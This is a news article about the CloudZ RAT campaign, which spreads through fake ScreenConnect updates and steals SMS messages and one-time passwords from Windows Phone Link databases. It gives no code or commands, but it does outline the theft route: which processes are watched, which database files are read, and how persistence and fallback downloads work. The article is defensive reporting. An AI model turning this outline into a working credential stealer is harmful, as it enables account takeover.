Security researchers have found a new and dangerous malware called CloudZ RAT. It secretly enters Windows computers and targets Microsoft Phone Link. Its goal is to steal private messages and one-time passwords (OTPs) from phones connected to the computer.
This attack has been happening since at least January 2026. It puts users at risk because hackers can steal SMS texts, call logs, notifications, and OTP codes used for bank logins or app verification. The scary part is that they can do this without touching the phone itself. Experts from Cisco Talos discovered this attack and warned that anyone using Phone Link could be at risk if their PC is infected.
The attack begins when hackers trick users into downloading a fake software update. It looks like an update for ScreenConnect, which is a real remote support tool. The fake file may have names like “systemupdates.exe” or “Windows-interactive-update.exe.” Inside this file is hidden malicious code written in Rust that quietly installs more harmful programs.
Also Read: Samsung Begins One UI 8.5 Rollout with Advanced Galaxy AI Features for Older Flagships
This leads to another program that stays active on the system using Windows scheduled tasks. It runs through trusted system tools like regasm.exe to avoid detection. Soon, the full CloudZ RAT gets installed. It is designed to avoid antivirus detection by using tricks like anti-debugging checks, sandbox detection, and changing its web activity to look normal.
Once installed, CloudZ connects to hacker-controlled servers to receive instructions. It also downloads extra tools, including a new plugin called Pheno. This plugin specifically targets Microsoft Phone Link.
Pheno watches for important Phone Link processes such as YourPhone.exe, PhoneExperienceHost.exe, and Link to Windows. It then accesses local database files like PhoneExperiences-*.db. These files store synced data from the phone, including messages, notifications, and OTPs from banks or emails.
This is dangerous because Phone Link acts as a direct connection between the phone and the computer. If the computer is infected, hackers can see everything synced from the phone, including private chats and security codes. The malware can store this data temporarily and then send it to hacker servers.
Pheno also checks if Phone Link is actively connected and only steals data when the connection is live. This makes the attack more effective. Since no malware is needed on the phone, the attack works faster and is more dangerous, especially for users who rely on SMS-based logins.
CloudZ uses multiple methods to download its harmful files. If one method fails, it tries others like curl, PowerShell, or bitsadmin. This helps the attack continue even if some defenses are in place. Reports confirm that this threat is active as of May 2026, but it is still unknown who is behind it or how many people have been affected. The main goal is to steal login credentials and authentication codes.
Also Read: Google Rolls Out May 2026 Android 16 Update for Pixel With Charging, Camera, and Display Fixes
To stay safe, experts recommend downloading software only from official and trusted websites. Do not click on links or open email attachments from unknown sources. Keep antivirus software updated so it can detect such threats.
Users should also be careful when linking their phones to shared or work computers through Microsoft Phone Link. Regularly check active sessions in the app settings. Although Microsoft has not released a specific fix yet, using full-disk encryption and stronger authentication methods (not just SMS) can provide better protection.